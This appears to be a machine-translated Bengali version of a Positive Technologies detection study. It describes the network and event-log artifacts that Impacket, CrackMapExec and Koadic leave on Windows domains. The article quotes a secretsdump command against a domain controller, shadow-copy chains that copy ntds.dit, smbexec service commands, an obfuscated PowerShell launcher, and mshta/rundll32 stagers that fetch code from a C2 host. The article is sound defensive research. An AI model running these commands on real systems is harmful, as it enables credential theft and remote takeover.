উইন্ডোজ অবকাঠামোতে আক্রমণগুলি কীভাবে সনাক্ত করা যায়: হ্যাকার সরঞ্জামগুলি অন্বেষণ করা

কর্পোরেট সেক্টরে হামলার সংখ্যা প্রতি বছর বাড়ছে: উদাহরণস্বরূপ, 2017 সালে 13% বেশি অনন্য ঘটনা রেকর্ড করা হয়েছে 2016 এর চেয়ে, এবং 2018 এর শেষে — 27% বেশি ঘটনাআগের সময়ের তুলনায়। সেগুলি সহ যেখানে প্রধান কাজের টুল হল উইন্ডোজ অপারেটিং সিস্টেম। 2017-2018 সালে, APT ড্রাগনফ্লাই, APT28, APT MuddyWater ইউরোপ, উত্তর আমেরিকা এবং সৌদি আরবের সরকারী ও সামরিক সংস্থার উপর হামলা চালায়। এবং তারা এর জন্য তিনটি সরঞ্জাম ব্যবহার করেছিল - ইমপ্যাকেট, ক্র্যাকম্যাপেক্সেক и কোডিক. তাদের সোর্স কোড খোলা এবং GitHub এ উপলব্ধ।

এটি লক্ষণীয় যে এই সরঞ্জামগুলি প্রাথমিক অনুপ্রবেশের জন্য ব্যবহৃত হয় না, তবে অবকাঠামোর মধ্যে আক্রমণের বিকাশের জন্য ব্যবহৃত হয়। আক্রমণকারীরা ঘের অনুপ্রবেশের পরে আক্রমণের বিভিন্ন পর্যায়ে এগুলি ব্যবহার করে। এটি, উপায় দ্বারা, সনাক্ত করা কঠিন এবং প্রায়শই শুধুমাত্র প্রযুক্তির সাহায্যে নেটওয়ার্ক ট্র্যাফিকের মধ্যে আপস ট্রেস সনাক্ত বা সরঞ্জাম একটি অনুপ্রবেশকারী অবকাঠামো ভেদ করার পরে তার সক্রিয় ক্রিয়া সনাক্ত করুন. টুলগুলি ফাইল স্থানান্তর থেকে শুরু করে রেজিস্ট্রির সাথে ইন্টারঅ্যাক্ট করা এবং দূরবর্তী মেশিনে কমান্ড চালানো পর্যন্ত বিভিন্ন ধরনের ফাংশন প্রদান করে। আমরা তাদের নেটওয়ার্ক কার্যকলাপ নির্ধারণ করতে এই সরঞ্জামগুলির একটি অধ্যয়ন পরিচালনা করেছি৷

আমাদের যা করার দরকার ছিল:

• হ্যাকিং টুল কিভাবে কাজ করে তা বুঝুন. আক্রমণকারীদের কী কাজে লাগাতে হবে এবং তারা কী প্রযুক্তি ব্যবহার করতে পারে তা খুঁজে বের করুন।
• আক্রমণের প্রথম পর্যায়ে তথ্য সুরক্ষা সরঞ্জাম দ্বারা যা সনাক্ত করা যায় না তা সন্ধান করুন. আক্রমণকারী একজন অভ্যন্তরীণ আক্রমণকারী হওয়ার কারণে, অথবা আক্রমণকারী অবকাঠামোর একটি ত্রুটিকে কাজে লাগাচ্ছে যা পূর্বে জানা যায়নি। তার ক্রিয়াকলাপের পুরো চেইনটি পুনরুদ্ধার করা সম্ভব হয়, তাই আরও আন্দোলন সনাক্ত করার ইচ্ছা জাগে।
• অনুপ্রবেশ সনাক্তকরণ সরঞ্জাম থেকে মিথ্যা ইতিবাচক নির্মূল. আমাদের ভুলে যাওয়া উচিত নয় যে যখন শুধুমাত্র বুদ্ধিমত্তার ভিত্তিতে কিছু কাজ আবিষ্কৃত হয়, তখন ঘন ঘন ত্রুটিগুলি সম্ভব। সাধারণত অবকাঠামোতে পর্যাপ্ত সংখ্যক উপায় রয়েছে, যে কোনো তথ্য পাওয়ার জন্য প্রথম নজরে বৈধ থেকে আলাদা করা যায় না।

এই সরঞ্জামগুলি আক্রমণকারীদের কী দেয়? যদি এটি একটি ইমপ্যাকেট হয়, তবে আক্রমণকারীরা মডিউলগুলির একটি বড় লাইব্রেরি পায় যা ঘের অনুপ্রবেশের পরে আক্রমণের বিভিন্ন পর্যায়ে ব্যবহার করা যেতে পারে। অনেক টুল অভ্যন্তরীণভাবে Impacket মডিউল ব্যবহার করে, যেমন Metasploit। এটিতে দূরবর্তীভাবে কমান্ড চালানোর জন্য dcomexec এবং wmiexec রয়েছে, ইমপ্যাকেট থেকে মেমরি অ্যাকাউন্ট যোগ করার জন্য সিক্রেটসডাম্প রয়েছে। ফলস্বরূপ, এই জাতীয় লাইব্রেরির কার্যকলাপের সঠিক সনাক্তকরণ ডেরিভেটিভগুলির সনাক্তকরণ নিশ্চিত করবে।

CrackMapExec (বা সহজভাবে CME) সম্পর্কে, নির্মাতারা একটি কারণের জন্য "পাওয়ারড বাই ইমপ্যাকেট" লিখেছেন। এছাড়াও, জনপ্রিয় পরিস্থিতিগুলির জন্য CME-এর তৈরি কার্যকারিতা রয়েছে: এটি পাসওয়ার্ড বা তাদের হ্যাশগুলি পাওয়ার জন্য মিমিকাটজ, এবং দূরবর্তী সম্পাদনের জন্য মিটারপ্রেটার বা এম্পায়ার এজেন্টের প্রবর্তন এবং বোর্ডে ব্লাডহাউন্ড।

আমাদের পছন্দের তৃতীয় টুল হল Koadic. এটি বেশ তাজা, এটি 25 সালে আন্তর্জাতিক হ্যাকার কনফারেন্স DEFCON 2017-এ উপস্থাপিত হয়েছিল এবং একটি অ-মানক পদ্ধতি রয়েছে: এটি HTTP, Java স্ক্রিপ্ট এবং Microsoft Visual Basic Script (VBS) এর মাধ্যমে কাজ করে। এই পদ্ধতিটিকে বলা হয় লিভিং অফ ল্যান্ড: টুলটি উইন্ডোজে তৈরি নির্ভরতা এবং লাইব্রেরির একটি সেট ব্যবহার করে। নির্মাতারা এটিকে COM কমান্ড অ্যান্ড কন্ট্রোল বা C3 বলে।

IMPACKET

ইমপ্যাকেটের কার্যকারিতা অত্যন্ত বিস্তৃত, AD এর মধ্যে পুনঃসূচনা করা থেকে শুরু করে অভ্যন্তরীণ MS SQL সার্ভার থেকে ডেটা সংগ্রহ করা, শংসাপত্রগুলি পাওয়ার কৌশলগুলির সাথে শেষ হয়: এটি একটি SMB রিলে আক্রমণ, এবং একটি ডোমেন থেকে ব্যবহারকারীর পাসওয়ার্ড হ্যাশ ধারণকারী ntds.dit ফাইল প্রাপ্ত করা। নিয়ামক ইমপ্যাকেট চারটি ভিন্ন পদ্ধতি ব্যবহার করে দূরবর্তীভাবে কমান্ডগুলি চালায়: WMI এর মাধ্যমে, উইন্ডোজ শিডিউলার, DCOM এবং SMB পরিচালনা করার জন্য একটি পরিষেবা এবং এর জন্য এটির প্রমাণপত্রের প্রয়োজন।

গোপন ডাম্প

চলুন secretsdump কটাক্ষপাত করা যাক. এটি একটি মডিউল যা ব্যবহারকারীর মেশিন এবং ডোমেন কন্ট্রোলার উভয়কেই লক্ষ্য করতে পারে। এটির সাহায্যে, আপনি LSA, SAM, SECURITY, NTDS.dit মেমরি এলাকার কপি পেতে পারেন, তাই এটি আক্রমণের বিভিন্ন পর্যায়ে দেখা যায়। মডিউল পরিচালনার প্রথম ধাপ হল SMB এর মাধ্যমে প্রমাণীকরণ, যার জন্য হয় ব্যবহারকারীর পাসওয়ার্ড বা হ্যাশের প্রয়োজন হয় স্বয়ংক্রিয়ভাবে পাস দ্য হ্যাশ আক্রমণ চালানোর জন্য। এরপরে একটি অনুরোধ আসে সার্ভিস কন্ট্রোল ম্যানেজার (এসসিএম) এর কাছে অ্যাক্সেস খোলার এবং উইনরেগ প্রোটোকল ব্যবহার করে রেজিস্ট্রিতে অ্যাক্সেস পাওয়ার জন্য, যা ব্যবহার করে আক্রমণকারী তার আগ্রহের শাখাগুলির ডেটা খুঁজে পেতে এবং SMB এর মাধ্যমে ফলাফল পেতে পারে।

ডুমুর উপর. 1 আমরা দেখতে পাই কিভাবে, উইনরেগ প্রোটোকল ব্যবহার করার সময়, LSA-এর সাথে রেজিস্ট্রি কী দ্বারা অ্যাক্সেস পাওয়া যায়। এটি করার জন্য, opcode 15 - OpenKey সহ DCERPC কমান্ডটি ব্যবহার করুন।

ভাত। 1. winreg প্রোটোকল ব্যবহার করে একটি রেজিস্ট্রি কী খোলা

আরও, যখন কী দ্বারা অ্যাক্সেস পাওয়া যায়, তখন মানগুলি SaveKey কমান্ডের দ্বারা অপকোড 20 দ্বারা সংরক্ষিত হয়। ইমপ্যাকেট এটি একটি খুব নির্দিষ্ট উপায়ে করে। এটি একটি ফাইলে মান সংরক্ষণ করে যার নাম .tmp যুক্ত 8 র্যান্ডম অক্ষরের একটি স্ট্রিং। উপরন্তু, সিস্টেম32 ডিরেক্টরি থেকে SMB-এর মাধ্যমে এই ফাইলটির আরও আনলোড করা হয় (চিত্র 2)।

ভাত। 2. দূরবর্তী মেশিন থেকে একটি রেজিস্ট্রি কী পাওয়ার স্কিম

দেখা যাচ্ছে যে আপনি উইনরেগ প্রোটোকল, নির্দিষ্ট নাম, কমান্ড এবং তাদের অর্ডার ব্যবহার করে রেজিস্ট্রির নির্দিষ্ট শাখাগুলি অনুসন্ধান করে নেটওয়ার্কে এই জাতীয় কার্যকলাপ সনাক্ত করতে পারেন।

এছাড়াও, এই মডিউলটি উইন্ডোজ ইভেন্ট লগে ট্রেস ছেড়ে দেয়, যার কারণে এটি সহজেই সনাক্ত করা যায়। উদাহরণস্বরূপ, কমান্ড কার্যকর করার ফলে

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

উইন্ডোজ সার্ভার 2016 লগে আমরা ইভেন্টগুলির নিম্নলিখিত মূল ক্রমটি দেখতে পাব:

1. 4624 - দূরবর্তী লগন।
2. 5145 - উইনরেগ রিমোট সার্ভিসে অ্যাক্সেসের অধিকার পরীক্ষা করা হচ্ছে।
3. 5145 - System32 ডিরেক্টরিতে একটি ফাইলের অ্যাক্সেসের অধিকার পরীক্ষা করা হচ্ছে। ফাইলটিতে উপরে উল্লিখিত র্যান্ডম নাম রয়েছে।
4. 4688 - একটি cmd.exe প্রক্রিয়া তৈরি করা যা vssadmin চালু করে:

“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - কমান্ড দিয়ে একটি প্রক্রিয়া তৈরি করা:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - কমান্ড দিয়ে একটি প্রক্রিয়া তৈরি করা:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - কমান্ড দিয়ে একটি প্রক্রিয়া তৈরি করা:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

Smbexec

অনেক পোস্ট-শোষণ সরঞ্জামের মতো, ইমপ্যাকেটের দূরবর্তী কমান্ড কার্যকর করার জন্য মডিউল রয়েছে। আমরা smbexec-এ ফোকাস করব, যা আপনাকে দূরবর্তী মেশিনে একটি ইন্টারেক্টিভ কমান্ড শেল দেয়। এই মডিউলটির জন্য পাসওয়ার্ড বা হ্যাশ সহ SMB এর মাধ্যমে প্রমাণীকরণেরও প্রয়োজন। ডুমুর উপর. 3 আমরা এই ধরনের একটি টুলের অপারেশনের একটি উদাহরণ দেখতে পাই, এই ক্ষেত্রে এটি স্থানীয় প্রশাসক কনসোল।

ভাত। 3. smbexec ইন্টারেক্টিভ কনসোল

প্রমাণীকরণের পর smbexec-এর প্রথম ধাপ হল OpenSCManagerW(15) কমান্ড দিয়ে SCM খুলতে হবে। ক্যোয়ারীটি উল্লেখযোগ্য: এতে MachineName ফিল্ডটি DUMMY তে সেট করা আছে।

ভাত। 4. সার্ভিস কন্ট্রোল ম্যানেজার খুলতে অনুরোধ করুন

এরপরে, CreateServiceW (12) কমান্ড ব্যবহার করে পরিষেবাটি তৈরি করা হয়। smbexec এর ক্ষেত্রে, আমরা প্রতিবার একই কমান্ড বিল্ডিং লজিক দেখতে পারি। ডুমুর উপর. 5 সবুজ রঙ কমান্ডের অপরিবর্তনীয় পরামিতি নির্দেশ করে, হলুদ - আক্রমণকারী কী পরিবর্তন করতে পারে। এটি দেখা সহজ যে এক্সিকিউটেবল ফাইলের নাম, এর ডিরেক্টরি এবং আউটপুট ফাইল পরিবর্তন করা যেতে পারে, তবে ইমপ্যাকেট মডিউলের যুক্তি লঙ্ঘন না করে বাকিগুলি পরিবর্তন করা অনেক বেশি কঠিন।

ভাত। 5. সার্ভিস কন্ট্রোল ম্যানেজার ব্যবহার করে একটি পরিষেবা তৈরি করার অনুরোধ

Smbexec এছাড়াও Windows ইভেন্ট লগে স্পষ্ট চিহ্ন রেখে যায়। ipconfig কমান্ড সহ একটি ইন্টারেক্টিভ কমান্ড শেলের জন্য উইন্ডোজ সার্ভার 2016 লগে, আমরা ইভেন্টগুলির নিম্নলিখিত কী ক্রম দেখতে পাই:

1. 4697 - শিকারের মেশিনে পরিষেবা ইনস্টল করা:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 - পয়েন্ট 1 থেকে আর্গুমেন্ট সহ cmd.exe প্রক্রিয়া তৈরি করা।
3. 5145 - C$ ডিরেক্টরিতে __output ফাইলের অ্যাক্সেসের অধিকার পরীক্ষা করা হচ্ছে।
4. 4697 - শিকারের মেশিনে পরিষেবা ইনস্টল করা।

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - পয়েন্ট 4 থেকে আর্গুমেন্ট সহ cmd.exe প্রক্রিয়া তৈরি করা।
6. 5145 - C$ ডিরেক্টরিতে __output ফাইলের অ্যাক্সেসের অধিকার পরীক্ষা করা হচ্ছে।

ইমপ্যাকেট আক্রমণের সরঞ্জামগুলি বিকাশের ভিত্তি। এটি উইন্ডোজ অবকাঠামোতে প্রায় সমস্ত প্রোটোকল সমর্থন করে এবং একই সাথে এর নিজস্ব বৈশিষ্ট্য রয়েছে। এখানে নির্দিষ্ট উইনরেগ অনুরোধ, এবং কমান্ডের বৈশিষ্ট্যগত গঠন সহ SCM API ব্যবহার, এবং ফাইলের নামের বিন্যাস, এবং SMB শেয়ার SYSTEM32।

CRACKMAPEXEC

CME টুলটি প্রাথমিকভাবে সেই রুটিন অ্যাকশনগুলিকে স্বয়ংক্রিয় করার জন্য ডিজাইন করা হয়েছে যা একজন আক্রমণকারীকে নেটওয়ার্কের মধ্যে অগ্রসর হওয়ার জন্য করতে হয়। এটি আপনাকে কুখ্যাত এম্পায়ার এজেন্ট এবং মিটারপ্রেটারের সাথে একযোগে কাজ করতে দেয়। অদৃশ্যভাবে কমান্ড চালানোর জন্য, CME তাদের অস্পষ্ট করতে পারে। ব্লাডহাউন্ড (একটি পৃথক রিকনেসান্স টুল) ব্যবহার করে, একজন আক্রমণকারী একটি সক্রিয় ডোমেন প্রশাসক সেশনের জন্য অনুসন্ধানটি স্বয়ংক্রিয়ভাবে করতে পারে।

গোয়েন্দা

একটি স্বতন্ত্র হাতিয়ার হিসাবে ব্লাডহাউন্ড আপনাকে নেটওয়ার্কের মধ্যে উন্নত পুনরুদ্ধার করতে দেয়। এটি ব্যবহারকারী, মেশিন, গোষ্ঠী, সেশন সম্পর্কে ডেটা সংগ্রহ করে এবং পাওয়ারশেল স্ক্রিপ্ট বা বাইনারি হিসাবে আসে। LDAP বা SMB ভিত্তিক প্রোটোকল তথ্য সংগ্রহ করতে ব্যবহৃত হয়। সিএমই ইন্টিগ্রেশন মডিউল আপনাকে ব্লাডহাউন্ডকে শিকারের মেশিনে ডাউনলোড করতে, এটি চালাতে এবং কার্যকর করার পরে সংগৃহীত ডেটা গ্রহণ করতে দেয়, যার ফলে সিস্টেমে ক্রিয়াগুলি স্বয়ংক্রিয় হয় এবং সেগুলি কম লক্ষণীয় হয়। ব্লাডহাউন্ডের গ্রাফিকাল শেল গ্রাফ আকারে সংগৃহীত ডেটা উপস্থাপন করে, যা আপনাকে আক্রমণকারীর মেশিন থেকে ডোমেন প্রশাসকের কাছে সংক্ষিপ্ততম পথ খুঁজে পেতে দেয়।

ভাত। 6. ব্লাডহাউন্ড ইন্টারফেস

শিকারের মেশিনে চালানোর জন্য, মডিউলটি ATSVC এবং SMB ব্যবহার করে একটি টাস্ক তৈরি করে। ATSVC হল Windows Task Scheduler এর সাথে কাজ করার জন্য একটি ইন্টারফেস। CME নেটওয়ার্কে চাকরি তৈরি করতে তার NetrJobAdd(1) ফাংশন ব্যবহার করে। CME মডিউল যা পাঠায় তার একটি উদাহরণ চিত্রে দেখানো হয়েছে। 7: এটি cmd.exe কমান্ডের একটি কল এবং XML বিন্যাসে আর্গুমেন্ট আকারে অস্পষ্ট কোড।

চিত্র 7. CME এর মাধ্যমে একটি টাস্ক তৈরি করা

কার্যটি সম্পাদনের জন্য জমা দেওয়ার পরে, শিকারের মেশিন নিজেই ব্লাডহাউন্ড শুরু করে এবং এটি ট্র্যাফিকের মধ্যে দেখা যায়। মডিউলটি স্ট্যান্ডার্ড গ্রুপ, ডোমেনের সমস্ত মেশিন এবং ব্যবহারকারীদের একটি তালিকা, SRVSVC NetSessEnum অনুরোধের মাধ্যমে সক্রিয় ব্যবহারকারীর সেশন সম্পর্কে তথ্য পাওয়ার জন্য LDAP কোয়েরি দ্বারা চিহ্নিত করা হয়।

ভাত। 8. SMB এর মাধ্যমে সক্রিয় সেশনের একটি তালিকা পাওয়া

এছাড়াও, অডিটিং সক্ষম করে শিকারের মেশিনে ব্লাডহাউন্ড শুরু করার সাথে একটি আইডি 4688 (প্রসেস তৈরি) এবং প্রক্রিয়ার নাম রয়েছে «C:WindowsSystem32cmd.exe». এটিতে উল্লেখযোগ্য কমান্ড লাইন আর্গুমেন্ট:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "

enum_avproducts

enum_avproducts মডিউল কার্যকারিতা এবং বাস্তবায়নের দৃষ্টিকোণ থেকে খুব আকর্ষণীয়। WMI আপনাকে বিভিন্ন উইন্ডোজ অবজেক্ট থেকে ডেটা পেতে WQL ক্যোয়ারী ভাষা ব্যবহার করতে দেয়, যা মূলত এই CME মডিউল ব্যবহার করে। এটি শিকারের মেশিনে ইনস্টল করা সুরক্ষা সরঞ্জাম সম্পর্কে AntiSpywareProduct এবং AntiMirusProduct ক্লাসে প্রশ্ন তৈরি করে। প্রয়োজনীয় ডেটা পাওয়ার জন্য, মডিউলটি rootSecurityCenter2 নামস্থানের সাথে সংযোগ করে, তারপর একটি WQL কোয়েরি তৈরি করে এবং একটি প্রতিক্রিয়া পায়। ডুমুর উপর. 9 এই ধরনের অনুরোধ এবং প্রতিক্রিয়া বিষয়বস্তু দেখায়. আমাদের উদাহরণে, উইন্ডোজ ডিফেন্ডার পাওয়া গেছে।

ভাত। 9. enum_avproducts মডিউলের নেটওয়ার্ক কার্যকলাপ

প্রায়শই WMI (ট্রেস WMI-অ্যাক্টিভিটি) নিরীক্ষণ করা হয়, যে ইভেন্টগুলিতে আপনি WQL প্রশ্নগুলি সম্পর্কে দরকারী তথ্য পেতে পারেন, বন্ধ করা যেতে পারে। কিন্তু যদি এটি সক্ষম করা হয়, তাহলে enum_avproducts স্ক্রিপ্টটি চালানো হলে, ID 11 সহ একটি ইভেন্ট সংরক্ষণ করা হবে। এতে অনুরোধ জমা দেওয়া ব্যবহারকারীর নাম এবং rootSecurityCenter2 নামস্থানে নাম থাকবে।

প্রতিটি সিএমই মডিউলের নিজস্ব আর্টিফ্যাক্ট ছিল, তা নির্দিষ্ট WQL প্রশ্নই হোক বা LDAP এবং SMB-তে অস্পষ্টতা এবং ব্লাডহাউন্ড-নির্দিষ্ট কার্যকলাপ সহ টাস্ক শিডিউলারে একটি নির্দিষ্ট ধরণের টাস্ক তৈরি করা হোক।

KOADIC

কোডিকের একটি স্বতন্ত্র বৈশিষ্ট্য হল উইন্ডোজে অন্তর্নির্মিত জাভাস্ক্রিপ্ট এবং ভিবিএসস্ক্রিপ্ট দোভাষীর ব্যবহার। এই অর্থে, এটি ভূমির বাইরে বসবাসের প্রবণতা অনুসরণ করে - অর্থাৎ, এটির কোনও বাহ্যিক নির্ভরতা নেই এবং এটি মানক উইন্ডোজ সরঞ্জাম ব্যবহার করে। এটি একটি পূর্ণাঙ্গ কমান্ড অ্যান্ড কন্ট্রোল (CnC) এর একটি টুল, কারণ সংক্রমণের পরে, একটি "ইমপ্লান্ট" মেশিনে ইনস্টল করা হয়, যা এটিকে নিয়ন্ত্রণ করার অনুমতি দেয়। এই ধরনের একটি মেশিন, কোডিক পরিভাষায়, একটি "জম্বি" বলা হয়। যদি শিকারের পাশে সম্পূর্ণরূপে কাজ করার জন্য পর্যাপ্ত সুযোগ-সুবিধা না থাকে, Koadic-এর কাছে ব্যবহারকারী অ্যাকাউন্ট কন্ট্রোল বাইপাস (UAC বাইপাস) কৌশল ব্যবহার করে তাদের বাড়াতে সক্ষম।

ভাত। 10. কোডিক কমান্ড শেল

শিকারকে অবশ্যই কমান্ড ও কন্ট্রোল সার্ভারের সাথে যোগাযোগ শুরু করতে হবে। এটি করার জন্য, তাকে একটি প্রাক-প্রস্তুত ইউআরআই অ্যাক্সেস করতে হবে এবং স্টেজারগুলির একটি ব্যবহার করে মূল কোডিক বডি পেতে হবে। ডুমুর উপর. 11 স্টেজার mshta এর জন্য একটি উদাহরণ দেখায়।

ভাত। 11. CnC সার্ভারের সাথে সেশনের সূচনা

প্রতিক্রিয়ার WS ভেরিয়েবলের মাধ্যমে, এটা স্পষ্ট হয়ে যায় যে WScript.Shell এর মাধ্যমে এক্সিকিউশন ঘটে এবং STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE ভেরিয়েবলে বর্তমান সেশনের প্যারামিটার সম্পর্কে মূল তথ্য থাকে। এটি CnC সার্ভারের সাথে HTTP সংযোগে প্রথম অনুরোধ-প্রতিক্রিয়া জোড়া। পরবর্তী অনুরোধগুলি সরাসরি বলা মডিউল (ইমপ্লান্ট) এর কার্যকারিতার সাথে সম্পর্কিত। সমস্ত Koadic মডিউল শুধুমাত্র একটি সক্রিয় CnC সেশনের সাথে কাজ করে।

Mimikatz

ঠিক যেমন CME ব্লাডহাউন্ডের সাথে কাজ করে, Koadic একটি পৃথক প্রোগ্রাম হিসাবে Mimikatz-এর সাথে কাজ করে এবং এটি চালানোর বিভিন্ন উপায় রয়েছে। নিচে একটি Mimikatz ইমপ্লান্ট ডাউনলোড করার জন্য একটি অনুরোধ-প্রতিক্রিয়া জোড়া দেওয়া হল৷

ভাত। 12. Koadic এ Mimikatz স্থানান্তর

আপনি দেখতে পারেন কিভাবে অনুরোধে URI এর বিন্যাস পরিবর্তিত হয়েছে। এটিতে csrf ভেরিয়েবলের একটি মান রয়েছে, যা নির্বাচিত মডিউলের জন্য দায়ী। তার নামের প্রতি কোন মনোযোগ দেবেন না; আমরা সবাই জানি যে CSRF সাধারণত ভিন্নভাবে বোঝা যায়। কোডিকের একই প্রধান অংশ প্রতিক্রিয়াতে এসেছিল, যার সাথে মিমিকাটজ সম্পর্কিত কোড যুক্ত করা হয়েছিল। এটি বেশ বড়, তাই আসুন মূল পয়েন্টগুলি দেখুন। এখানে বেস64-এনকোডেড মিমিকাটজ লাইব্রেরি, সিরিয়ালাইজড .NET ক্লাস যা এটিকে ইনজেক্ট করবে এবং মিমিকাটজ চালানোর আর্গুমেন্ট। এক্সিকিউশনের ফলাফল নেটওয়ার্কে স্পষ্ট পাঠ্যে প্রেরণ করা হয়।

ভাত। 13. একটি দূরবর্তী মেশিনে Mimikatz চালানোর ফলাফল

Exec_cmd

কোডিকেরও মডিউল রয়েছে যা দূরবর্তীভাবে কমান্ড চালাতে পারে। এখানে আমরা একই URI জেনারেশন পদ্ধতি এবং পরিচিত sid এবং csrf ভেরিয়েবল দেখতে পাব। exec_cmd মডিউলের ক্ষেত্রে, বডিতে কোড যোগ করা হয় যা শেল কমান্ড কার্যকর করতে সক্ষম। নিম্নলিখিত কোডটি CnC সার্ভারের HTTP প্রতিক্রিয়াতে দেখানো হয়েছে।

ভাত। 14. ইমপ্লান্ট কোড exec_cmd

কোড এক্সিকিউশনের জন্য পরিচিত WS অ্যাট্রিবিউট সহ ভেরিয়েবল GAWTUUGCFI প্রয়োজন। এর সাহায্যে, ইমপ্লান্টটি শেলকে কল করে, দুটি কোড শাখা প্রক্রিয়াকরণ করে - shell.exec আউটপুট ডেটা স্ট্রীম এবং shell.run ফেরত না দিয়ে।

Koadic একটি সাধারণ টুল নয়, কিন্তু এটির নিজস্ব নিদর্শন রয়েছে যার দ্বারা এটি বৈধ ট্র্যাফিক পাওয়া যেতে পারে:

• HTTP অনুরোধের বিশেষ গঠন,
• winHttpRequests API ব্যবহার করে,
• ActiveXObject এর মাধ্যমে একটি WScript.Shell অবজেক্ট তৈরি করা,
• বড় এক্সিকিউটেবল বডি।

প্রাথমিক সংযোগ স্টেজার শুরু করে, তাই উইন্ডোজ ইভেন্টের মাধ্যমে এর কার্যকলাপ সনাক্ত করা সম্ভব হয়। mshta-এর জন্য, এটি ইভেন্ট 4688, যা সূচনা বৈশিষ্ট্য সহ একটি প্রক্রিয়া তৈরির নির্দেশ করে:

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

Koadic চালানোর সময়, অন্যান্য 4688 ইভেন্টগুলি এমন বৈশিষ্ট্যগুলির সাথে দেখা যেতে পারে যা এটিকে পুরোপুরি বৈশিষ্ট্যযুক্ত করে:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

তথ্যও

ল্যান্ড অফ ল্যান্ড প্রবণতা সাইবার অপরাধীদের মধ্যে জনপ্রিয়তা অর্জন করছে। তারা তাদের প্রয়োজনের জন্য বিল্ট-ইন উইন্ডোজ টুল এবং মেকানিজম ব্যবহার করে। আমরা দেখতে পাই জনপ্রিয় টুল Koadic, CrackMapExec এবং Impacket এই নীতি অনুসরণ করে APT রিপোর্টে আরও ঘন ঘন প্রদর্শিত হচ্ছে। এই সরঞ্জামগুলির জন্য GitHub-এ কাঁটাচামচের সংখ্যাও ক্রমবর্ধমান হচ্ছে, নতুনগুলি উপস্থিত হচ্ছে (এগুলি ইতিমধ্যে প্রায় এক হাজার রয়েছে)। প্রবণতাটি তার সরলতার কারণে জনপ্রিয়তা পাচ্ছে: আক্রমণকারীদের তৃতীয় পক্ষের সরঞ্জামের প্রয়োজন হয় না, তারা ইতিমধ্যেই ক্ষতিগ্রস্তদের মেশিনে রয়েছে এবং নিরাপত্তা ব্যবস্থা বাইপাস করতে সহায়তা করে। আমরা নেটওয়ার্ক মিথস্ক্রিয়া অধ্যয়নের উপর দৃষ্টি নিবদ্ধ করছি: উপরে বর্ণিত প্রতিটি টুল নেটওয়ার্ক ট্র্যাফিকের মধ্যে তার চিহ্ন রেখে যায়; তাদের বিস্তারিত অধ্যয়ন আমাদের পণ্য শেখাতে অনুমতি দেয় পিটি নেটওয়ার্ক অ্যাটাক ডিসকভারি তাদের সনাক্ত করতে, যা শেষ পর্যন্ত তাদের জড়িত সাইবার ঘটনার সমগ্র চেইন তদন্ত করতে সাহায্য করে।

লেখক:

• অ্যান্টন টিউরিন, বিশেষজ্ঞ পরিষেবা বিভাগের প্রধান, পিটি বিশেষজ্ঞ নিরাপত্তা কেন্দ্র, পজিটিভ টেকনোলজিস
• ইগর পডমোকভ, বিশেষজ্ঞ, পিটি বিশেষজ্ঞ নিরাপত্তা কেন্দ্র, পজিটিভ টেকনোলজিস

উত্স: www.habr.com